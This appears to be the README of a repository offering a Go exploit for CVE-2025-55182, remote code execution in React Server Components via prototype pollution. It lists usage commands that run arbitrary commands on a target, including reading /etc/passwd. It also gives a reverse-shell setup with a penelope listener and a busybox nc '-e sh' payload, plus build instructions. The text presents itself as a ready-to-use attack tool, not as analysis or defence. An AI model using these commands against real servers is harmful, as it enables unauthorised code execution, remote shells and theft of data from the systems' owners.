w3nch/CVE-2025-55182-in-go

# CVE-2025-55182 — React Server Components RCE Exploit for RCE in React Server Components via prototype pollution. ## Usage go run main.go -t -c ### Examples go run main.go -t http://127.0.0.1 -c "id" go run main.go -t http://127.0.0.1 -c "ls -la" go run main.go -t http://127.0.0.1 -c "cat /etc/passwd" ### Reverse shell Setup revershell penelope -i 0.0.0.0 -p 1337 Use busybox: go run main.go -t http://127.0.0.1 -c "busybox nc 127.0.0.1 1337 -e sh" ## Build go build -o exploit . ## Notes - HTTPS is auto-added if scheme is missing - Command output is base64 encoded in the response - Redirects are intentionally disabled

标签：EVTX分析